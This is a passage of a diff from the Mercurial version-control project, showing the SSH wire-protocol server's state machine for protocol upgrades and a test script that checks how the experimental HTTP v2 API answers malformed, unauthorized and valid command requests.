644 # version 1 except for the handshake.
692 # version 1 except for the handshake.
645
693
646 state = 'protov1-serving'
694 state = 'protov1-serving'
647 proto = sshv1protocolhandler(ui, fin, fout)
695 proto = sshv1protocolhandler(ui, fin, fout)
648 protoswitched = False
696 protoswitched = False
649
697
650 while not ev.is_set():
698 while not ev.is_set():
651 if state == 'protov1-serving':
699 if state == 'protov1-serving':
652 # Commands are issued on new lines.
700 # Commands are issued on new lines.
653 request = fin.readline()[:-1]
701 request = fin.readline()[:-1]
654
702
655 # Empty lines signal to terminate the connection.
703 # Empty lines signal to terminate the connection.
656 if not request:
704 if not request:
657 state = 'shutdown'
705 state = 'shutdown'
658 continue
706 continue
659
707
660 # It looks like a protocol upgrade request. Transition state to
708 # It looks like a protocol upgrade request. Transition state to
661 # handle it.
709 # handle it.
662 if request.startswith(b'upgrade '):
710 if request.startswith(b'upgrade '):
663 if protoswitched:
711 if protoswitched:
664 _sshv1respondooberror(fout, ui.ferr,
712 _sshv1respondooberror(fout, ui.ferr,
665 b'cannot upgrade protocols multiple '
713 b'cannot upgrade protocols multiple '
666 b'times')
714 b'times')
667 state = 'shutdown'
715 state = 'shutdown'
668 continue
716 continue
669
717
670 state = 'upgrade-initial'
718 state = 'upgrade-initial'
671 continue
719 continue
672
720
673 available = wireproto.commands.commandavailable(request, proto)
721 available = wireproto.commands.commandavailable(request, proto)
674
722
675 # This command isn't available. Send an empty response and go
723 # This command isn't available. Send an empty response and go
676 # back to waiting for a new command.
724 # back to waiting for a new command.
677 if not available:
725 if not available:
678 _sshv1respondbytes(fout, b'')
726 _sshv1respondbytes(fout, b'')
679 continue
727 continue
680
728
681 rsp = wireproto.dispatch(repo, proto, request)
729 rsp = wireproto.dispatch(repo, proto, request)
682
730
683 if isinstance(rsp, bytes):
731 if isinstance(rsp, bytes):
684 _sshv1respondbytes(fout, rsp)
732 _sshv1respondbytes(fout, rsp)
685 elif isinstance(rsp, wireprototypes.bytesresponse):
733 elif isinstance(rsp, wireprototypes.bytesresponse):
686 _sshv1respondbytes(fout, rsp.data)
734 _sshv1respondbytes(fout, rsp.data)
687 elif isinstance(rsp, wireprototypes.streamres):
735 elif isinstance(rsp, wireprototypes.streamres):
688 _sshv1respondstream(fout, rsp)
736 _sshv1respondstream(fout, rsp)
689 elif isinstance(rsp, wireprototypes.streamreslegacy):
737 elif isinstance(rsp, wireprototypes.streamreslegacy):
690 _sshv1respondstream(fout, rsp)
738 _sshv1respondstream(fout, rsp)
691 elif isinstance(rsp, wireprototypes.pushres):
739 elif isinstance(rsp, wireprototypes.pushres):
692 _sshv1respondbytes(fout, b'')
740 _sshv1respondbytes(fout, b'')
693 _sshv1respondbytes(fout, b'%d' % rsp.res)
741 _sshv1respondbytes(fout, b'%d' % rsp.res)
694 elif isinstance(rsp, wireprototypes.pusherr):
742 elif isinstance(rsp, wireprototypes.pusherr):
695 _sshv1respondbytes(fout, rsp.res)
743 _sshv1respondbytes(fout, rsp.res)
696 elif isinstance(rsp, wireprototypes.ooberror):
744 elif isinstance(rsp, wireprototypes.ooberror):
697 _sshv1respondooberror(fout, ui.ferr, rsp.message)
745 _sshv1respondooberror(fout, ui.ferr, rsp.message)
698 else:
746 else:
699 raise error.ProgrammingError('unhandled response type from '
747 raise error.ProgrammingError('unhandled response type from '
700 'wire protocol command: %s' % rsp)
748 'wire protocol command: %s' % rsp)
701
749
702 # For now, protocol version 2 serving just goes back to version 1.
750 # For now, protocol version 2 serving just goes back to version 1.
703 elif state == 'protov2-serving':
751 elif state == 'protov2-serving':
704 state = 'protov1-serving'
752 state = 'protov1-serving'
705 continue
753 continue
706
754
707 elif state == 'upgrade-initial':
755 elif state == 'upgrade-initial':
708 # We should never transition into this state if we've switched
756 # We should never transition into this state if we've switched
709 # protocols.
757 # protocols.
710 assert not protoswitched
758 assert not protoswitched
711 assert proto.name == wireprototypes.SSHV1
759 assert proto.name == wireprototypes.SSHV1
712
760
713 # Expected: upgrade <token> <capabilities>
761 # Expected: upgrade <token> <capabilities>
714 # If we get something else, the request is malformed. It could be
762 # If we get something else, the request is malformed. It could be
715 # from a future client that has altered the upgrade line content.
763 # from a future client that has altered the upgrade line content.
716 # We treat this as an unknown command.
764 # We treat this as an unknown command.
717 try:
765 try:
718 token, caps = request.split(b' ')[1:]
766 token, caps = request.split(b' ')[1:]
719 except ValueError:
767 except ValueError:
720 _sshv1respondbytes(fout, b'')
768 _sshv1respondbytes(fout, b'')
721 state = 'protov1-serving'
769 state = 'protov1-serving'
722 continue
770 continue
723
771
724 # Send empty response if we don't support upgrading protocols.
772 # Send empty response if we don't support upgrading protocols.
725 if not ui.configbool('experimental', 'sshserver.support-v2'):
773 if not ui.configbool('experimental', 'sshserver.support-v2'):
726 _sshv1respondbytes(fout, b'')
774 _sshv1respondbytes(fout, b'')
727 state = 'protov1-serving'
775 state = 'protov1-serving'
728 continue
776 continue
729
777
730 try:
778 try:
731 caps = urlreq.parseqs(caps)
779 caps = urlreq.parseqs(caps)
732 except ValueError:
780 except ValueError:
733 _sshv1respondbytes(fout, b'')
781 _sshv1respondbytes(fout, b'')
734 state = 'protov1-serving'
782 state = 'protov1-serving'
735 continue
783 continue
736
784
737 # We don't see an upgrade request to protocol version 2. Ignore
785 # We don't see an upgrade request to protocol version 2. Ignore
738 # the upgrade request.
786 # the upgrade request.
739 wantedprotos = caps.get(b'proto', [b''])[0]
787 wantedprotos = caps.get(b'proto', [b''])[0]
740 if SSHV2 not in wantedprotos:
788 if SSHV2 not in wantedprotos:
741 _sshv1respondbytes(fout, b'')
789 _sshv1respondbytes(fout, b'')
742 state = 'protov1-serving'
790 state = 'protov1-serving'
743 continue
791 continue
744
792
745 # It looks like we can honor this upgrade request to protocol 2.
793 # It looks like we can honor this upgrade request to protocol 2.
746 # Filter the rest of the handshake protocol request lines.
794 # Filter the rest of the handshake protocol request lines.
747 state = 'upgrade-v2-filter-legacy-handshake'
795 state = 'upgrade-v2-filter-legacy-handshake'
748 continue
796 continue
749
797
750 elif state == 'upgrade-v2-filter-legacy-handshake':
798 elif state == 'upgrade-v2-filter-legacy-handshake':
751 # Client should have sent legacy handshake after an ``upgrade``
799 # Client should have sent legacy handshake after an ``upgrade``
752 # request. Expected lines:
800 # request. Expected lines:
753 #
801 #
754 # hello
802 # hello
755 # between
803 # between
756 # pairs 81
804 # pairs 81
757 # 0000...-0000...
805 # 0000...-0000...
758
806
759 ok = True
807 ok = True
760 for line in (b'hello', b'between', b'pairs 81'):
808 for line in (b'hello', b'between', b'pairs 81'):
761 request = fin.readline()[:-1]
809 request = fin.readline()[:-1]
762
810
763 if request != line:
811 if request != line:
764 _sshv1respondooberror(fout, ui.ferr,
812 _sshv1respondooberror(fout, ui.ferr,
765 b'malformed handshake protocol: '
813 b'malformed handshake protocol: '
766 b'missing %s' % line)
814 b'missing %s' % line)
767 ok = False
815 ok = False
768 state = 'shutdown'
816 state = 'shutdown'
769 break
817 break
770
818
771 if not ok:
819 if not ok:
772 continue
820 continue
773
821
774 request = fin.read(81)
822 request = fin.read(81)
775 if request != b'%s-%s' % (b'0' * 40, b'0' * 40):
823 if request != b'%s-%s' % (b'0' * 40, b'0' * 40):
776 _sshv1respondooberror(fout, ui.ferr,
824 _sshv1respondooberror(fout, ui.ferr,
777 b'malformed handshake protocol: '
825 b'malformed handshake protocol: '
778 b'missing between argument value')
826 b'missing between argument value')
779 state = 'shutdown'
827 state = 'shutdown'
780 continue
828 continue
781
829
782 state = 'upgrade-v2-finish'
830 state = 'upgrade-v2-finish'
783 continue
831 continue
784
832
785 elif state == 'upgrade-v2-finish':
833 elif state == 'upgrade-v2-finish':
786 # Send the upgrade response.
834 # Send the upgrade response.
787 fout.write(b'upgraded %s %s\n' % (token, SSHV2))
835 fout.write(b'upgraded %s %s\n' % (token, SSHV2))
788 servercaps = wireproto.capabilities(repo, proto)
836 servercaps = wireproto.capabilities(repo, proto)
789 rsp = b'capabilities: %s' % servercaps.data
837 rsp = b'capabilities: %s' % servercaps.data
790 fout.write(b'%d\n%s\n' % (len(rsp), rsp))
838 fout.write(b'%d\n%s\n' % (len(rsp), rsp))
791 fout.flush()
839 fout.flush()
792
840
793 proto = sshv2protocolhandler(ui, fin, fout)
841 proto = sshv2protocolhandler(ui, fin, fout)
794 protoswitched = True
842 protoswitched = True
795
843
796 state = 'protov2-serving'
844 state = 'protov2-serving'
797 continue
845 continue
798
846
799 elif state == 'shutdown':
847 elif state == 'shutdown':
800 break
848 break
801
849
802 else:
850 else:
803 raise error.ProgrammingError('unhandled ssh server state: %s' %
851 raise error.ProgrammingError('unhandled ssh server state: %s' %
804 state)
852 state)
805
853
806 class sshserver(object):
854 class sshserver(object):
807 def __init__(self, ui, repo, logfh=None):
855 def __init__(self, ui, repo, logfh=None):
808 self._ui = ui
856 self._ui = ui
809 self._repo = repo
857 self._repo = repo
810 self._fin = ui.fin
858 self._fin = ui.fin
811 self._fout = ui.fout
859 self._fout = ui.fout
812
860
813 # Log write I/O to stdout and stderr if configured.
861 # Log write I/O to stdout and stderr if configured.
814 if logfh:
862 if logfh:
815 self._fout = util.makeloggingfileobject(
863 self._fout = util.makeloggingfileobject(
816 logfh, self._fout, 'o', logdata=True)
864 logfh, self._fout, 'o', logdata=True)
817 ui.ferr = util.makeloggingfileobject(
865 ui.ferr = util.makeloggingfileobject(
818 logfh, ui.ferr, 'e', logdata=True)
866 logfh, ui.ferr, 'e', logdata=True)
819
867
820 hook.redirect(True)
868 hook.redirect(True)
821 ui.fout = repo.ui.fout = ui.ferr
869 ui.fout = repo.ui.fout = ui.ferr
822
870
823 # Prevent insertion/deletion of CRs
871 # Prevent insertion/deletion of CRs
824 util.setbinary(self._fin)
872 util.setbinary(self._fin)
825 util.setbinary(self._fout)
873 util.setbinary(self._fout)
826
874
827 def serve_forever(self):
875 def serve_forever(self):
828 self.serveuntil(threading.Event())
876 self.serveuntil(threading.Event())
829 sys.exit(0)
877 sys.exit(0)
830
878
831 def serveuntil(self, ev):
879 def serveuntil(self, ev):
832 """Serve until a threading.Event is set."""
880 """Serve until a threading.Event is set."""
833 _runsshserver(self._ui, self._repo, self._fin, self._fout, ev)
881 _runsshserver(self._ui, self._repo, self._fin, self._fout, ev)
@@ -1,331 +1,406 b''
1 $ HTTPV2=exp-http-v2-0001
1 $ HTTPV2=exp-http-v2-0001
2 $ MEDIATYPE=application/mercurial-exp-framing-0001
2 $ MEDIATYPE=application/mercurial-exp-framing-0001
3
3
4 $ send() {
4 $ send() {
5 > hg --verbose debugwireproto --peer raw http://$LOCALIP:$HGPORT/
5 > hg --verbose debugwireproto --peer raw http://$LOCALIP:$HGPORT/
6 > }
6 > }
7
7
8 $ cat > dummycommands.py << EOF
8 $ cat > dummycommands.py << EOF
9 > from mercurial import wireprototypes, wireproto
9 > from mercurial import wireprototypes, wireproto
10 > @wireproto.wireprotocommand('customreadonly', permission='pull')
10 > @wireproto.wireprotocommand('customreadonly', permission='pull')
11 > def customreadonly(repo, proto):
11 > def customreadonly(repo, proto):
12 > return wireprototypes.bytesresponse(b'customreadonly bytes response')
12 > return wireprototypes.bytesresponse(b'customreadonly bytes response')
13 > @wireproto.wireprotocommand('customreadwrite', permission='push')
13 > @wireproto.wireprotocommand('customreadwrite', permission='push')
14 > def customreadwrite(repo, proto):
14 > def customreadwrite(repo, proto):
15 > return wireprototypes.bytesresponse(b'customreadwrite bytes response')
15 > return wireprototypes.bytesresponse(b'customreadwrite bytes response')
16 > EOF
16 > EOF
17
17
18 $ cat >> $HGRCPATH << EOF
18 $ cat >> $HGRCPATH << EOF
19 > [extensions]
19 > [extensions]
20 > dummycommands = $TESTTMP/dummycommands.py
20 > dummycommands = $TESTTMP/dummycommands.py
21 > EOF
21 > EOF
22
22
23 $ hg init server
23 $ hg init server
24 $ cat > server/.hg/hgrc << EOF
24 $ cat > server/.hg/hgrc << EOF
25 > [experimental]
25 > [experimental]
26 > web.apiserver = true
26 > web.apiserver = true
27 > EOF
27 > EOF
28 $ hg -R server serve -p $HGPORT -d --pid-file hg.pid
28 $ hg -R server serve -p $HGPORT -d --pid-file hg.pid
29 $ cat hg.pid > $DAEMON_PIDS
29 $ cat hg.pid > $DAEMON_PIDS
30
30
31 HTTP v2 protocol not enabled by default
31 HTTP v2 protocol not enabled by default
32
32
33 $ send << EOF
33 $ send << EOF
34 > httprequest GET api/$HTTPV2
34 > httprequest GET api/$HTTPV2
35 > user-agent: test
35 > user-agent: test
36 > EOF
36 > EOF
37 using raw connection to peer
37 using raw connection to peer
38 s> GET /api/exp-http-v2-0001 HTTP/1.1\r\n
38 s> GET /api/exp-http-v2-0001 HTTP/1.1\r\n
39 s> Accept-Encoding: identity\r\n
39 s> Accept-Encoding: identity\r\n
40 s> user-agent: test\r\n
40 s> user-agent: test\r\n
41 s> host: $LOCALIP:$HGPORT\r\n (glob)
41 s> host: $LOCALIP:$HGPORT\r\n (glob)
42 s> \r\n
42 s> \r\n
43 s> makefile('rb', None)
43 s> makefile('rb', None)
44 s> HTTP/1.1 404 Not Found\r\n
44 s> HTTP/1.1 404 Not Found\r\n
45 s> Server: testing stub value\r\n
45 s> Server: testing stub value\r\n
46 s> Date: $HTTP_DATE$\r\n
46 s> Date: $HTTP_DATE$\r\n
47 s> Content-Type: text/plain\r\n
47 s> Content-Type: text/plain\r\n
48 s> Content-Length: 33\r\n
48 s> Content-Length: 33\r\n
49 s> \r\n
49 s> \r\n
50 s> API exp-http-v2-0001 not enabled\n
50 s> API exp-http-v2-0001 not enabled\n
51
51
52 Restart server with support for HTTP v2 API
52 Restart server with support for HTTP v2 API
53
53
54 $ killdaemons.py
54 $ killdaemons.py
55 $ cat > server/.hg/hgrc << EOF
55 $ cat > server/.hg/hgrc << EOF
56 > [experimental]
56 > [experimental]
57 > web.apiserver = true
57 > web.apiserver = true
58 > web.api.http-v2 = true
58 > web.api.http-v2 = true
59 > EOF
59 > EOF
60
60
61 $ hg -R server serve -p $HGPORT -d --pid-file hg.pid
61 $ hg -R server serve -p $HGPORT -d --pid-file hg.pid
62 $ cat hg.pid > $DAEMON_PIDS
62 $ cat hg.pid > $DAEMON_PIDS
63
63
64 Request to unknown command yields 404
64 Request to unknown command yields 404
65
65
66 $ send << EOF
66 $ send << EOF
67 > httprequest POST api/$HTTPV2/ro/badcommand
67 > httprequest POST api/$HTTPV2/ro/badcommand
68 > user-agent: test
68 > user-agent: test
69 > EOF
69 > EOF
70 using raw connection to peer
70 using raw connection to peer
71 s> POST /api/exp-http-v2-0001/ro/badcommand HTTP/1.1\r\n
71 s> POST /api/exp-http-v2-0001/ro/badcommand HTTP/1.1\r\n
72 s> Accept-Encoding: identity\r\n
72 s> Accept-Encoding: identity\r\n
73 s> user-agent: test\r\n
73 s> user-agent: test\r\n
74 s> host: $LOCALIP:$HGPORT\r\n (glob)
74 s> host: $LOCALIP:$HGPORT\r\n (glob)
75 s> \r\n
75 s> \r\n
76 s> makefile('rb', None)
76 s> makefile('rb', None)
77 s> HTTP/1.1 404 Not Found\r\n
77 s> HTTP/1.1 404 Not Found\r\n
78 s> Server: testing stub value\r\n
78 s> Server: testing stub value\r\n
79 s> Date: $HTTP_DATE$\r\n
79 s> Date: $HTTP_DATE$\r\n
80 s> Content-Type: text/plain\r\n
80 s> Content-Type: text/plain\r\n
81 s> Content-Length: 42\r\n
81 s> Content-Length: 42\r\n
82 s> \r\n
82 s> \r\n
83 s> unknown wire protocol command: badcommand\n
83 s> unknown wire protocol command: badcommand\n
84
84
85 GET to read-only command yields a 405
85 GET to read-only command yields a 405
86
86
87 $ send << EOF
87 $ send << EOF
88 > httprequest GET api/$HTTPV2/ro/customreadonly
88 > httprequest GET api/$HTTPV2/ro/customreadonly
89 > user-agent: test
89 > user-agent: test
90 > EOF
90 > EOF
91 using raw connection to peer
91 using raw connection to peer
92 s> GET /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
92 s> GET /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
93 s> Accept-Encoding: identity\r\n
93 s> Accept-Encoding: identity\r\n
94 s> user-agent: test\r\n
94 s> user-agent: test\r\n
95 s> host: $LOCALIP:$HGPORT\r\n (glob)
95 s> host: $LOCALIP:$HGPORT\r\n (glob)
96 s> \r\n
96 s> \r\n
97 s> makefile('rb', None)
97 s> makefile('rb', None)
98 s> HTTP/1.1 405 Method Not Allowed\r\n
98 s> HTTP/1.1 405 Method Not Allowed\r\n
99 s> Server: testing stub value\r\n
99 s> Server: testing stub value\r\n
100 s> Date: $HTTP_DATE$\r\n
100 s> Date: $HTTP_DATE$\r\n
101 s> Allow: POST\r\n
101 s> Allow: POST\r\n
102 s> Content-Length: 30\r\n
102 s> Content-Length: 30\r\n
103 s> \r\n
103 s> \r\n
104 s> commands require POST requests
104 s> commands require POST requests
105
105
106 Missing Accept header results in 406
106 Missing Accept header results in 406
107
107
108 $ send << EOF
108 $ send << EOF
109 > httprequest POST api/$HTTPV2/ro/customreadonly
109 > httprequest POST api/$HTTPV2/ro/customreadonly
110 > user-agent: test
110 > user-agent: test
111 > EOF
111 > EOF
112 using raw connection to peer
112 using raw connection to peer
113 s> POST /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
113 s> POST /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
114 s> Accept-Encoding: identity\r\n
114 s> Accept-Encoding: identity\r\n
115 s> user-agent: test\r\n
115 s> user-agent: test\r\n
116 s> host: $LOCALIP:$HGPORT\r\n (glob)
116 s> host: $LOCALIP:$HGPORT\r\n (glob)
117 s> \r\n
117 s> \r\n
118 s> makefile('rb', None)
118 s> makefile('rb', None)
119 s> HTTP/1.1 406 Not Acceptable\r\n
119 s> HTTP/1.1 406 Not Acceptable\r\n
120 s> Server: testing stub value\r\n
120 s> Server: testing stub value\r\n
121 s> Date: $HTTP_DATE$\r\n
121 s> Date: $HTTP_DATE$\r\n
122 s> Content-Type: text/plain\r\n
122 s> Content-Type: text/plain\r\n
123 s> Content-Length: 85\r\n
123 s> Content-Length: 85\r\n
124 s> \r\n
124 s> \r\n
125 s> client MUST specify Accept header with value: application/mercurial-exp-framing-0001\n
125 s> client MUST specify Accept header with value: application/mercurial-exp-framing-0001\n
126
126
127 Bad Accept header results in 406
127 Bad Accept header results in 406
128
128
129 $ send << EOF
129 $ send << EOF
130 > httprequest POST api/$HTTPV2/ro/customreadonly
130 > httprequest POST api/$HTTPV2/ro/customreadonly
131 > accept: invalid
131 > accept: invalid
132 > user-agent: test
132 > user-agent: test
133 > EOF
133 > EOF
134 using raw connection to peer
134 using raw connection to peer
135 s> POST /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
135 s> POST /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
136 s> Accept-Encoding: identity\r\n
136 s> Accept-Encoding: identity\r\n
137 s> accept: invalid\r\n
137 s> accept: invalid\r\n
138 s> user-agent: test\r\n
138 s> user-agent: test\r\n
139 s> host: $LOCALIP:$HGPORT\r\n (glob)
139 s> host: $LOCALIP:$HGPORT\r\n (glob)
140 s> \r\n
140 s> \r\n
141 s> makefile('rb', None)
141 s> makefile('rb', None)
142 s> HTTP/1.1 406 Not Acceptable\r\n
142 s> HTTP/1.1 406 Not Acceptable\r\n
143 s> Server: testing stub value\r\n
143 s> Server: testing stub value\r\n
144 s> Date: $HTTP_DATE$\r\n
144 s> Date: $HTTP_DATE$\r\n
145 s> Content-Type: text/plain\r\n
145 s> Content-Type: text/plain\r\n
146 s> Content-Length: 85\r\n
146 s> Content-Length: 85\r\n
147 s> \r\n
147 s> \r\n
148 s> client MUST specify Accept header with value: application/mercurial-exp-framing-0001\n
148 s> client MUST specify Accept header with value: application/mercurial-exp-framing-0001\n
149
149
150 Bad Content-Type header results in 415
150 Bad Content-Type header results in 415
151
151
152 $ send << EOF
152 $ send << EOF
153 > httprequest POST api/$HTTPV2/ro/customreadonly
153 > httprequest POST api/$HTTPV2/ro/customreadonly
154 > accept: $MEDIATYPE
154 > accept: $MEDIATYPE
155 > user-agent: test
155 > user-agent: test
156 > content-type: badmedia
156 > content-type: badmedia
157 > EOF
157 > EOF
158 using raw connection to peer
158 using raw connection to peer
159 s> POST /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
159 s> POST /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
160 s> Accept-Encoding: identity\r\n
160 s> Accept-Encoding: identity\r\n
161 s> accept: application/mercurial-exp-framing-0001\r\n
161 s> accept: application/mercurial-exp-framing-0001\r\n
162 s> content-type: badmedia\r\n
162 s> content-type: badmedia\r\n
163 s> user-agent: test\r\n
163 s> user-agent: test\r\n
164 s> host: $LOCALIP:$HGPORT\r\n (glob)
164 s> host: $LOCALIP:$HGPORT\r\n (glob)
165 s> \r\n
165 s> \r\n
166 s> makefile('rb', None)
166 s> makefile('rb', None)
167 s> HTTP/1.1 415 Unsupported Media Type\r\n
167 s> HTTP/1.1 415 Unsupported Media Type\r\n
168 s> Server: testing stub value\r\n
168 s> Server: testing stub value\r\n
169 s> Date: $HTTP_DATE$\r\n
169 s> Date: $HTTP_DATE$\r\n
170 s> Content-Type: text/plain\r\n
170 s> Content-Type: text/plain\r\n
171 s> Content-Length: 88\r\n
171 s> Content-Length: 88\r\n
172 s> \r\n
172 s> \r\n
173 s> client MUST send Content-Type header with value: application/mercurial-exp-framing-0001\n
173 s> client MUST send Content-Type header with value: application/mercurial-exp-framing-0001\n
174
174
175 Request to read-only command works out of the box
175 Request to read-only command works out of the box
176
176
177 $ send << EOF
177 $ send << EOF
178 > httprequest POST api/$HTTPV2/ro/customreadonly
178 > httprequest POST api/$HTTPV2/ro/customreadonly
179 > accept: $MEDIATYPE
179 > accept: $MEDIATYPE
180 > content-type: $MEDIATYPE
180 > content-type: $MEDIATYPE
181 > user-agent: test
181 > user-agent: test
182 > frame command-name eos customreadonly
182 > frame command-name eos customreadonly
183 > EOF
183 > EOF
184 using raw connection to peer
184 using raw connection to peer
185 s> POST /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
185 s> POST /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
186 s> Accept-Encoding: identity\r\n
186 s> Accept-Encoding: identity\r\n
187 s> accept: application/mercurial-exp-framing-0001\r\n
187 s> accept: application/mercurial-exp-framing-0001\r\n
188 s> content-type: application/mercurial-exp-framing-0001\r\n
188 s> content-type: application/mercurial-exp-framing-0001\r\n
189 s> user-agent: test\r\n
189 s> user-agent: test\r\n
190 s> content-length: 18\r\n
190 s> content-length: 18\r\n
191 s> host: $LOCALIP:$HGPORT\r\n (glob)
191 s> host: $LOCALIP:$HGPORT\r\n (glob)
192 s> \r\n
192 s> \r\n
193 s> \x0e\x00\x00\x11customreadonly
193 s> \x0e\x00\x00\x11customreadonly
194 s> makefile('rb', None)
194 s> makefile('rb', None)
195 s> HTTP/1.1 200 OK\r\n
195 s> HTTP/1.1 200 OK\r\n
196 s> Server: testing stub value\r\n
196 s> Server: testing stub value\r\n
197 s> Date: $HTTP_DATE$\r\n
197 s> Date: $HTTP_DATE$\r\n
198 s> Content-Type: text/plain\r\n
198 s> Content-Type: text/plain\r\n
199 s> Content-Length: 18\r\n
199 s> Content-Length: 18\r\n
200 s> \r\n
200 s> \r\n
201 s> ro/customreadonly\n
201 s> ro/customreadonly\n
202
202
203 Request to read-write command fails because server is read-only by default
203 Request to read-write command fails because server is read-only by default
204
204
205 GET to read-write request yields 405
205 GET to read-write request yields 405
206
206
207 $ send << EOF
207 $ send << EOF
208 > httprequest GET api/$HTTPV2/rw/customreadonly
208 > httprequest GET api/$HTTPV2/rw/customreadonly
209 > user-agent: test
209 > user-agent: test
210 > EOF
210 > EOF
211 using raw connection to peer
211 using raw connection to peer
212 s> GET /api/exp-http-v2-0001/rw/customreadonly HTTP/1.1\r\n
212 s> GET /api/exp-http-v2-0001/rw/customreadonly HTTP/1.1\r\n
213 s> Accept-Encoding: identity\r\n
213 s> Accept-Encoding: identity\r\n
214 s> user-agent: test\r\n
214 s> user-agent: test\r\n
215 s> host: $LOCALIP:$HGPORT\r\n (glob)
215 s> host: $LOCALIP:$HGPORT\r\n (glob)
216 s> \r\n
216 s> \r\n
217 s> makefile('rb', None)
217 s> makefile('rb', None)
218 s> HTTP/1.1 405 Method Not Allowed\r\n
218 s> HTTP/1.1 405 Method Not Allowed\r\n
219 s> Server: testing stub value\r\n
219 s> Server: testing stub value\r\n
220 s> Date: $HTTP_DATE$\r\n
220 s> Date: $HTTP_DATE$\r\n
221 s> Allow: POST\r\n
221 s> Allow: POST\r\n
222 s> Content-Length: 30\r\n
222 s> Content-Length: 30\r\n
223 s> \r\n
223 s> \r\n
224 s> commands require POST requests
224 s> commands require POST requests
225
225
226 Even for unknown commands
226 Even for unknown commands
227
227
228 $ send << EOF
228 $ send << EOF
229 > httprequest GET api/$HTTPV2/rw/badcommand
229 > httprequest GET api/$HTTPV2/rw/badcommand
230 > user-agent: test
230 > user-agent: test
231 > EOF
231 > EOF
232 using raw connection to peer
232 using raw connection to peer
233 s> GET /api/exp-http-v2-0001/rw/badcommand HTTP/1.1\r\n
233 s> GET /api/exp-http-v2-0001/rw/badcommand HTTP/1.1\r\n
234 s> Accept-Encoding: identity\r\n
234 s> Accept-Encoding: identity\r\n
235 s> user-agent: test\r\n
235 s> user-agent: test\r\n
236 s> host: $LOCALIP:$HGPORT\r\n (glob)
236 s> host: $LOCALIP:$HGPORT\r\n (glob)
237 s> \r\n
237 s> \r\n
238 s> makefile('rb', None)
238 s> makefile('rb', None)
239 s> HTTP/1.1 405 Method Not Allowed\r\n
239 s> HTTP/1.1 405 Method Not Allowed\r\n
240 s> Server: testing stub value\r\n
240 s> Server: testing stub value\r\n
241 s> Date: $HTTP_DATE$\r\n
241 s> Date: $HTTP_DATE$\r\n
242 s> Allow: POST\r\n
242 s> Allow: POST\r\n
243 s> Content-Length: 30\r\n
243 s> Content-Length: 30\r\n
244 s> \r\n
244 s> \r\n
245 s> commands require POST requests
245 s> commands require POST requests
246
246
247 SSL required by default
247 SSL required by default
248
248
249 $ send << EOF
249 $ send << EOF
250 > httprequest POST api/$HTTPV2/rw/customreadonly
250 > httprequest POST api/$HTTPV2/rw/customreadonly
251 > user-agent: test
251 > user-agent: test
252 > EOF
252 > EOF
253 using raw connection to peer
253 using raw connection to peer
254 s> POST /api/exp-http-v2-0001/rw/customreadonly HTTP/1.1\r\n
254 s> POST /api/exp-http-v2-0001/rw/customreadonly HTTP/1.1\r\n
255 s> Accept-Encoding: identity\r\n
255 s> Accept-Encoding: identity\r\n
256 s> user-agent: test\r\n
256 s> user-agent: test\r\n
257 s> host: $LOCALIP:$HGPORT\r\n (glob)
257 s> host: $LOCALIP:$HGPORT\r\n (glob)
258 s> \r\n
258 s> \r\n
259 s> makefile('rb', None)
259 s> makefile('rb', None)
260 s> HTTP/1.1 403 ssl required\r\n
260 s> HTTP/1.1 403 ssl required\r\n
261 s> Server: testing stub value\r\n
261 s> Server: testing stub value\r\n
262 s> Date: $HTTP_DATE$\r\n
262 s> Date: $HTTP_DATE$\r\n
263 s> Content-Length: 17\r\n
263 s> Content-Length: 17\r\n
264 s> \r\n
264 s> \r\n
265 s> permission denied
265 s> permission denied
266
266
267 Restart server to allow non-ssl read-write operations
267 Restart server to allow non-ssl read-write operations
268
268
269 $ killdaemons.py
269 $ killdaemons.py
270 $ cat > server/.hg/hgrc << EOF
270 $ cat > server/.hg/hgrc << EOF
271 > [experimental]
271 > [experimental]
272 > web.apiserver = true
272 > web.apiserver = true
273 > web.api.http-v2 = true
273 > web.api.http-v2 = true
274 > [web]
274 > [web]
275 > push_ssl = false
275 > push_ssl = false
276 > allow-push = *
276 > allow-push = *
277 > EOF
277 > EOF
278
278
279 $ hg -R server serve -p $HGPORT -d --pid-file hg.pid
279 $ hg -R server serve -p $HGPORT -d --pid-file hg.pid -E error.log
280 $ cat hg.pid > $DAEMON_PIDS
280 $ cat hg.pid > $DAEMON_PIDS
281
281
282 Authorized request for valid read-write command works
282 Authorized request for valid read-write command works
283
283
284 $ send << EOF
284 $ send << EOF
285 > httprequest POST api/$HTTPV2/rw/customreadonly
285 > httprequest POST api/$HTTPV2/rw/customreadonly
286 > user-agent: test
286 > user-agent: test
287 > accept: $MEDIATYPE
287 > accept: $MEDIATYPE
288 > content-type: $MEDIATYPE
288 > content-type: $MEDIATYPE
289 > frame command-name eos customreadonly
289 > frame command-name eos customreadonly
290 > EOF
290 > EOF
291 using raw connection to peer
291 using raw connection to peer
292 s> POST /api/exp-http-v2-0001/rw/customreadonly HTTP/1.1\r\n
292 s> POST /api/exp-http-v2-0001/rw/customreadonly HTTP/1.1\r\n
293 s> Accept-Encoding: identity\r\n
293 s> Accept-Encoding: identity\r\n
294 s> accept: application/mercurial-exp-framing-0001\r\n
294 s> accept: application/mercurial-exp-framing-0001\r\n
295 s> content-type: application/mercurial-exp-framing-0001\r\n
295 s> content-type: application/mercurial-exp-framing-0001\r\n
296 s> user-agent: test\r\n
296 s> user-agent: test\r\n
297 s> content-length: 18\r\n
297 s> content-length: 18\r\n
298 s> host: $LOCALIP:$HGPORT\r\n (glob)
298 s> host: $LOCALIP:$HGPORT\r\n (glob)
299 s> \r\n
299 s> \r\n
300 s> \x0e\x00\x00\x11customreadonly
300 s> \x0e\x00\x00\x11customreadonly
301 s> makefile('rb', None)
301 s> makefile('rb', None)
302 s> HTTP/1.1 200 OK\r\n
302 s> HTTP/1.1 200 OK\r\n
303 s> Server: testing stub value\r\n
303 s> Server: testing stub value\r\n
304 s> Date: $HTTP_DATE$\r\n
304 s> Date: $HTTP_DATE$\r\n
305 s> Content-Type: text/plain\r\n
